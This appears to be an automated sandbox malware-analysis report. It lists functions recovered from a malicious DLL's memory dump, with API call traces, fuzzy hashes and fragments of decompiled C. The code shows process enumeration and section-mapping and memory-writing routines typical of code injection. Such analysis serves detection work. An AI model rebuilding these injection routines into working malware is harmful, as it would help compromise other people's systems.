                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                • String ID:
                • API String ID: 2575439697-0
                • Opcode ID: 33891198bd0de8dcbb8e9eac5d6762f96271eaed603456006a17f85de33448c0
                • Instruction ID: 1a0129707ca9ae8520687cf96767656ffa9ded371a24be3be229b4de07c81f0b
                • Opcode Fuzzy Hash: 33891198bd0de8dcbb8e9eac5d6762f96271eaed603456006a17f85de33448c0
                • Instruction Fuzzy Hash: 48211971900219BFDB01AF95CC459EEBFBDEF48744F10402AF905EA150E7719E419BE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CAFD1 Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 046CAFFC
                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 046CB009
                • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 046CB095
                • GetModuleHandleA.KERNEL32(00000000), ref: 046CB0A0
                • RtlImageNtHeader.NTDLL(00000000), ref: 046CB0A9
                • RtlExitUserThread.NTDLL(00000000), ref: 046CB0BE
                  • Part of subcall function 046E3AA2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,046CB037,?), ref: 046E3AAA
                  • Part of subcall function 046E3AA2: GetVersion.KERNEL32 ref: 046E3AB9
                  • Part of subcall function 046E3AA2: GetCurrentProcessId.KERNEL32 ref: 046E3AD0
                  • Part of subcall function 046E3AA2: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 046E3AED
                  • Part of subcall function 046D7B55: memcpy.NTDLL(00000000,00000000,?,?,00000000,00000001,?,?,00000000,?,?,?,?,?,046CB045,?), ref: 046D7BB4
                  • Part of subcall function 046CE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,046DBCFE), ref: 046CE9D6
                  • Part of subcall function 046CAEC5: GetModuleHandleA.KERNEL32(?,?,?,?,?,046C1DC6,00000000), ref: 046CAEE6
                  • Part of subcall function 046CAEC5: GetProcAddress.KERNEL32(00000000,?), ref: 046CAEFF
                  • Part of subcall function 046CAEC5: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF1C
                  • Part of subcall function 046CAEC5: IsWow64Process.KERNEL32(?,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF2D
                  • Part of subcall function 046CAEC5: CloseHandle.KERNEL32(?,?,?,?,046C1DC6,00000000), ref: 046CAF40
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Process$HandleModule$CreateFileOpenThreadTime$AddressCloseCurrentEventExitHeaderHeapImageInformationNameProcQuerySystemUserVersionWow64memcpy
                • String ID:
                • API String ID: 3675227105-0
                • Opcode ID: a5944e0850e3dcc9a0f1c17aabbe09576df9ee6b83c6cf4f412dff5bd3481e90
                • Instruction ID: 3e117e3b9eee62786168a8d35b4289765dae2c322ac9a780ea767c023e659f35
                • Opcode Fuzzy Hash: a5944e0850e3dcc9a0f1c17aabbe09576df9ee6b83c6cf4f412dff5bd3481e90
                • Instruction Fuzzy Hash: 60318071A00218AFDB21EF69EC85ABE77B4FF44B54B10412DE521EB241F635AE44CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CA7FE Relevance: 7.7, APIs: 5, Instructions: 234nativeCOMMON
                Download Yara Rule
                APIs
                • memcpy.NTDLL(?,046C48CA,00000800,?,?,00000000,00000000), ref: 046CAA3F
                  • Part of subcall function 046C87CD: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,046CA90D,?,?,?,00000000,00000000), ref: 046C87F2
                  • Part of subcall function 046C87CD: GetProcAddress.KERNEL32(00000000,?), ref: 046C8814
                  • Part of subcall function 046C87CD: GetProcAddress.KERNEL32(00000000,?), ref: 046C882A
                  • Part of subcall function 046C87CD: GetProcAddress.KERNEL32(00000000,?), ref: 046C8840
                  • Part of subcall function 046C87CD: GetProcAddress.KERNEL32(00000000,?), ref: 046C8856
                  • Part of subcall function 046C87CD: GetProcAddress.KERNEL32(00000000,?), ref: 046C886C
                  • Part of subcall function 046D0FE0: NtMapViewOfSection.NTDLL(00000000,000000FF,046DBF30,00000000,00000000,046DBF30,00000000,00000002,00000000,?,?,00000000,046DBF30,000000FF,00000000), ref: 046D100E
                  • Part of subcall function 046E3C23: memcpy.NTDLL(?,?,?,?,?,?,046CC6EC,046CC6EC,?,?,?,00000000,00000000), ref: 046E3C89
                  • Part of subcall function 046E3C23: memcpy.NTDLL(00000000,?,?), ref: 046E3CE8
                • memcpy.NTDLL(?,?,?,?,?,046CC6EC,046CC6EC,046CC6EC,?,?,?,00000000,00000000), ref: 046CA96C
                • memcpy.NTDLL(?,?,00000018,?,?,046CC6EC,046CC6EC,046CC6EC,?,?,?,00000000,00000000), ref: 046CA9B8
                • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,00000000), ref: 046CAA7D
                • memset.NTDLL ref: 046CAABF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                • String ID:
                • API String ID: 1575695328-0
                • Opcode ID: b44e2035739a7c9fb8cf1b2b768052d43b04829b689627cf8a767c85ea4049ea
                • Instruction ID: 1c6ee3d8005e8d4910ec8bcc724e3ac268756302d98810096be00fe4697aa3c9
                • Opcode Fuzzy Hash: b44e2035739a7c9fb8cf1b2b768052d43b04829b689627cf8a767c85ea4049ea
                • Instruction Fuzzy Hash: 41912471A0120AEFDB10DFD9CA84BAEBBB4FF08304F14456DE801A7250E775BA95DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C12130 Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E01C12130() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x1c1a2d8; // 0x55d5a8
						_t2 = _t9 + 0x1c1beb0; // 0x73617661
						_push( &_v264);
						if( *0x1c1a118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                0x01c1213b
                0x01c12140
                0x01c12145
                0x01c12149
                0x01c12153
                0x01c12184
                0x01c1215a
                0x01c1215f
                0x01c1216c
                0x01c12175
                0x01c1218c
                0x01c12177
                0x01c1217f
                0x00000000
                0x01c1217f
                0x01c1218d
                0x01c1218e
                0x00000000
                0x01c1218e
                0x00000000
                0x01c12188
                0x01c12194
                0x01c12199

                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01C12140
                • Process32First.KERNEL32(00000000,?), ref: 01C12153
                • Process32Next.KERNEL32(00000000,?), ref: 01C1217F
                • CloseHandle.KERNEL32(00000000), ref: 01C1218E
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 420147892-0
                • Opcode ID: 440df82f9396561353b4667055d85a4a6bf9420a86ddb52a0e06a3768f00dace
                • Instruction ID: 227e2059961bf95eb6b6ee01c70a6a2b7dc412f7be22ef82dd0c222cb222ab48
                • Opcode Fuzzy Hash: 440df82f9396561353b4667055d85a4a6bf9420a86ddb52a0e06a3768f00dace
                • Instruction Fuzzy Hash: 79F0F63A181165EAD721E6A68C88FEB366CEB97350F200051EA19C3008EA34CF59A7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DBEBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                Download Yara Rule
                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 046DBF19
                  • Part of subcall function 046D0FE0: NtMapViewOfSection.NTDLL(00000000,000000FF,046DBF30,00000000,00000000,046DBF30,00000000,00000002,00000000,?,?,00000000,046DBF30,000000FF,00000000), ref: 046D100E
                • memset.NTDLL ref: 046DBF3D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID: @
                • API String ID: 2533685722-2766056989
                • Opcode ID: 563252fa79f553973f86358bcab1ca50d31ef9bbd93477e3025e744de34ab300
                • Instruction ID: 193bf6ddebbeb506bf7ca1502c451896bbbb6beec78e1f5174dcef0986745069
                • Opcode Fuzzy Hash: 563252fa79f553973f86358bcab1ca50d31ef9bbd93477e3025e744de34ab300
                • Instruction Fuzzy Hash: 18210E75D00209AFDB11DFA9C8849EEFBF9EB48354F108569E615F3250E730AA458F64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CE4DC Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                Download Yara Rule
                APIs
                • GetProcAddress.KERNEL32(?,00000318), ref: 046CE501
                • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 046CE51D
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                  • Part of subcall function 046CB45A: GetProcAddress.KERNEL32(?,00000000), ref: 046CB483
                  • Part of subcall function 046CB45A: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,046CE55E,00000000,00000000,00000028,00000100), ref: 046CB4A5
                • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 046CE687
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                • String ID:
                • API String ID: 3547194813-0
                • Opcode ID: 6bd0410efdc445ff453f38c00394c00ecf1f3c751217fd3cf8b90a3db31406d3
                • Instruction ID: 34be963d613732f087f8998398d5ae2cb828dd39d45d76379b2e0950e9ca5b0b
                • Opcode Fuzzy Hash: 6bd0410efdc445ff453f38c00394c00ecf1f3c751217fd3cf8b90a3db31406d3
                • Instruction Fuzzy Hash: D0613A70A1020AAFDB14DFA5C980BAEBBB4FF18304F10446DE905AB391E771E954CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C6F70 Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046C6F84
                • GetProcAddress.KERNEL32(?), ref: 046C6FAC
                • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 046C6FCA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressInformationProcProcess64QueryWow64memset
                • String ID:
                • API String ID: 2968673968-0
                • Opcode ID: 0fd232cd2b48c39db882856321d4ce8b64eb53000ef3db4d001c4aab52df2473
                • Instruction ID: 8bafe62255e026abc750011fa5ceddbbae96ad6b14558bd5247daa1081dd18fa
                • Opcode Fuzzy Hash: 0fd232cd2b48c39db882856321d4ce8b64eb53000ef3db4d001c4aab52df2473
                • Instruction Fuzzy Hash: B4115E31A00219AFEB10DF99DC49FA977E9EB44700F054029F904EB291FB75ED05CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E3E7D Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                Download Yara Rule
                APIs
                • NtAllocateVirtualMemory.NTDLL(046D6359,00000000,00000000,046D6359,00003000,00000040), ref: 046E3EAE
                • RtlNtStatusToDosError.NTDLL(00000000), ref: 046E3EB5
                • SetLastError.KERNEL32(00000000), ref: 046E3EBC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$AllocateLastMemoryStatusVirtual
                • String ID:
                • API String ID: 722216270-0
                • Opcode ID: 6324c8bf4d38934fffb3dbe92ab1cc154f8a40a847bbb5716a699376ff690e4f
                • Instruction ID: afcb091bc667973e7a69f4baca919a00150cc7738b4dda557a4ad549336d690d
                • Opcode Fuzzy Hash: 6324c8bf4d38934fffb3dbe92ab1cc154f8a40a847bbb5716a699376ff690e4f
                • Instruction Fuzzy Hash: F4F0FEB1911309FBEB05DB95D909BEE7BFCEB14345F104048A600AB180EBB8AB44DB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D70AC Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                Download Yara Rule
                APIs
                • NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,046D63FB,00000000,?,046D63FB,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 046D70CA
                • RtlNtStatusToDosError.NTDLL(C0000002), ref: 046D70D9
                • SetLastError.KERNEL32(00000000,?,046D63FB,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 046D70E0
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$LastMemoryStatusVirtualWrite
                • String ID:
                • API String ID: 1089604434-0
                • Opcode ID: ea17a231100b73700f8af404ce10ce8b7dd3121777b092a89564b848021e08d8
                • Instruction ID: 603497ddd3d84fa38b5c03bc3d7dcf9b7fdc337ebac248f7a136e81f774b2575
                • Opcode Fuzzy Hash: ea17a231100b73700f8af404ce10ce8b7dd3121777b092a89564b848021e08d8
                • Instruction Fuzzy Hash: B2E04F7660021AEBCF015EE9ED04DDB7BADEB48741B004020BE01D7160E736DC21ABE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C13807 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                Download Yara Rule
                C-Code - Quality: 21%
                			E01C13807(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				void* _v8;
				char _v12;
				signed int _t37;
				long _t39;
				long _t40;
				signed int _t41;
				void* _t42;
				signed int _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t68;
				void* _t71;

				_t68 = __esi;
				_t65 = E01C123CC(_t37, _a4);
				if(_t65 == 0) {
					L18:
					_t39 = GetLastError();
				} else {
					_t40 = GetVersion();
					_t71 = _t40 - 6;
					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t65, _a4, 0, 0, 0); // executed
					 *(_t68 + 0x10) = _t40;
					_t41 = E01C12C11(_t65);
					if( *(_t68 + 0x10) == 0) {
						goto L18;
					} else {
						_t42 = E01C123CC(_t41,  *_t68);
						_v8 = _t42;
						if(_t42 == 0) {
							goto L18;
						} else {
							_t67 = __imp__; // 0x6f99f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
								_t43 = E01C12C11(_v8);
								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x100;
									_t44 = E01C123CC(_t43,  *((intOrPtr*)(_t68 + 4)));
									_v8 = _t44;
									if(_t44 == 0) {
										goto L18;
									} else {
										_t45 =  *0x1c1a2d8; // 0x55d5a8
										_t21 = _t45 + 0x1c1b758; // 0x450047
										_t46 = _t21;
										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
										E01C12C11(_v8);
										_t48 =  *((intOrPtr*)(_t68 + 0x18));
										if(_t48 == 0) {
											goto L18;
										} else {
											_v12 = 4;
											__imp__(_t48, 0x1f,  &_a4,  &_v12);
											if(_t48 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
											}
											_push(4);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t68 + 0x18)));
											if( *_t67() == 0) {
												goto L18;
											} else {
												_push(4);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t68 + 0x18)));
												if( *_t67() == 0) {
													goto L18;
												} else {
													_t39 = 0;
												}
											}
										}
									}
								}
							} else {
								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
								if(_t42 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t39;
			}



















                0x01c13807
                0x01c13816
                0x01c1381c
                0x01c13952
                0x01c13952
                0x01c13822
                0x01c13822
                0x01c13828
                0x01c1382a
                0x01c13838
                0x01c13833
                0x01c13833
                0x01c13833
                0x01c13846
                0x01c1384d
                0x01c13850
                0x01c13858
                0x00000000
                0x01c1385e
                0x01c13860
                0x01c13867
                0x01c1386a
                0x00000000
                0x01c13870
                0x01c13873
                0x01c13879
                0x01c13890
                0x01c13899
                0x01c138a2
                0x01c138a5
                0x01c138ad
                0x00000000
                0x01c138b3
                0x01c138bb
                0x01c138be
                0x01c138c7
                0x01c138ca
                0x00000000
                0x01c138d0
                0x01c138d3
                0x01c138de
                0x01c138de
                0x01c138e8
                0x01c138f1
                0x01c138f4
                0x01c138f9
                0x01c138fe
                0x00000000
                0x01c13900
                0x01c1390b
                0x01c13912
                0x01c1391a
                0x01c1391c
                0x01c1392a
                0x01c1392a
                0x01c1392c
                0x01c13931
                0x01c13932
                0x01c13934
                0x01c1393b
                0x00000000
                0x01c1393d
                0x01c1393d
                0x01c13942
                0x01c13943
                0x01c13945
                0x01c1394c
                0x00000000
                0x01c1394e
                0x01c1394e
                0x01c1394e
                0x01c1394c
                0x01c1393b
                0x01c138fe
                0x01c138ca
                0x01c1387b
                0x01c13886
                0x01c1388a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x01c1388a
                0x01c13879
                0x01c1386a
                0x01c13858
                0x01c1395b

                APIs
                  • Part of subcall function 01C123CC: lstrlen.KERNEL32(?,00000000,02179B30,00000000,01C13413,02179D0E,69B25F44,?,?,?,?,69B25F44,00000005,01C1A010,4D283A53,?), ref: 01C123D3
                  • Part of subcall function 01C123CC: mbstowcs.NTDLL ref: 01C123FC
                  • Part of subcall function 01C123CC: memset.NTDLL ref: 01C1240E
                • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,01C11064,00000000,00000000,02179618,?,?,01C16C0C,?,02179618,0000EA60), ref: 01C13822
                • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,01C11064,00000000,00000000,02179618,?,?,01C16C0C,?,02179618,0000EA60), ref: 01C13952
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                • String ID:
                • API String ID: 4097109750-0
                • Opcode ID: e3730aca285f9fb82071ae6187f914764a9f0a98fb5bcbdaeab80a5c4be015ac
                • Instruction ID: ea40f8f8af458cf570f1bd33826088f4510221add935e22142b339d5c3167981
                • Opcode Fuzzy Hash: e3730aca285f9fb82071ae6187f914764a9f0a98fb5bcbdaeab80a5c4be015ac
                • Instruction Fuzzy Hash: 0E419171580289FFEB309FA4CC45EAA7BB9FB06754F00442ABB4686094D770DA84EB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C12F8D Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E01C12F8D(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E01C14AAF(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                0x01c12f96
                0x01c12f9d
                0x01c12f9e
                0x01c12f9f
                0x01c12fa0
                0x01c12fa1
                0x01c12fb2
                0x01c12fb6
                0x01c12fca
                0x01c12fcd
                0x01c12fd0
                0x01c12fd7
                0x01c12fda
                0x01c12fe1
                0x01c12fe4
                0x01c12fe7
                0x01c12fea
                0x01c12fef
                0x01c1302a
                0x01c12ff1
                0x01c12ff4
                0x01c12ffa
                0x01c12fff
                0x01c13003
                0x01c13021
                0x01c13005
                0x01c1300c
                0x01c1301a
                0x01c1301a
                0x01c13003
                0x01c13032

                APIs
                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,01C122B9), ref: 01C12FEA
                  • Part of subcall function 01C14AAF: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,01C12FFF,00000002,00000000,?,?,00000000,?,?,01C12FFF,00000000), ref: 01C14ADC
                • memset.NTDLL ref: 01C1300C
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Section$CreateViewmemset
                • String ID:
                • API String ID: 2533685722-0
                • Opcode ID: d7bc0329ad1286e6220c1ba02e4eb2ff034c4f1901b0d50070db802167d6fe14
                • Instruction ID: deb7d475d14768947b3c8781a62a9de51d866315ef42da1cbd627352bda07f2a
                • Opcode Fuzzy Hash: d7bc0329ad1286e6220c1ba02e4eb2ff034c4f1901b0d50070db802167d6fe14
                • Instruction Fuzzy Hash: 0B2108B2D00209EFCB11DFA9C8849EEFBF9FB48354F104429E606F3210D731AA449B64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CB45A Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                Download Yara Rule
                APIs
                • GetProcAddress.KERNEL32(?,00000000), ref: 046CB483
                • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,046CE55E,00000000,00000000,00000028,00000100), ref: 046CB4A5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressMemory64ProcReadVirtualWow64
                • String ID:
                • API String ID: 752694512-0
                • Opcode ID: 3b7722a316fc230f334a39d6706ad461c9a58d4a9bfc8c4d5628579a05494e04
                • Instruction ID: 65c4802f77e2c2357342f5defbef8b659ae491fea38a26ffab57393029a4fed8
                • Opcode Fuzzy Hash: 3b7722a316fc230f334a39d6706ad461c9a58d4a9bfc8c4d5628579a05494e04
                • Instruction Fuzzy Hash: 16F0497160020AAF9B018F86DC45CAEBBFAEB943207108019F504CB220E732E951DF20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C14AAF Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E01C14AAF(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                0x01c14ac1
                0x01c14ac7
                0x01c14ad5
                0x01c14adc
                0x01c14ae1
                0x01c14ae7
                0x00000000
                0x01c14ae8
                0x00000000

                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,01C12FFF,00000002,00000000,?,?,00000000,?,?,01C12FFF,00000000), ref: 01C14ADC
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction ID: ef21dd3a25c13631b82ea961a4c94dcb6a4d1104665c74f0f4c8203d3e359383
                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction Fuzzy Hash: 1BF012B690020CFFDB119FA5CC85C9FBBBDEB44354B104939B152E1094D6309E089A60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D0FE0 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                Download Yara Rule
                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,046DBF30,00000000,00000000,046DBF30,00000000,00000002,00000000,?,?,00000000,046DBF30,000000FF,00000000), ref: 046D100E
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
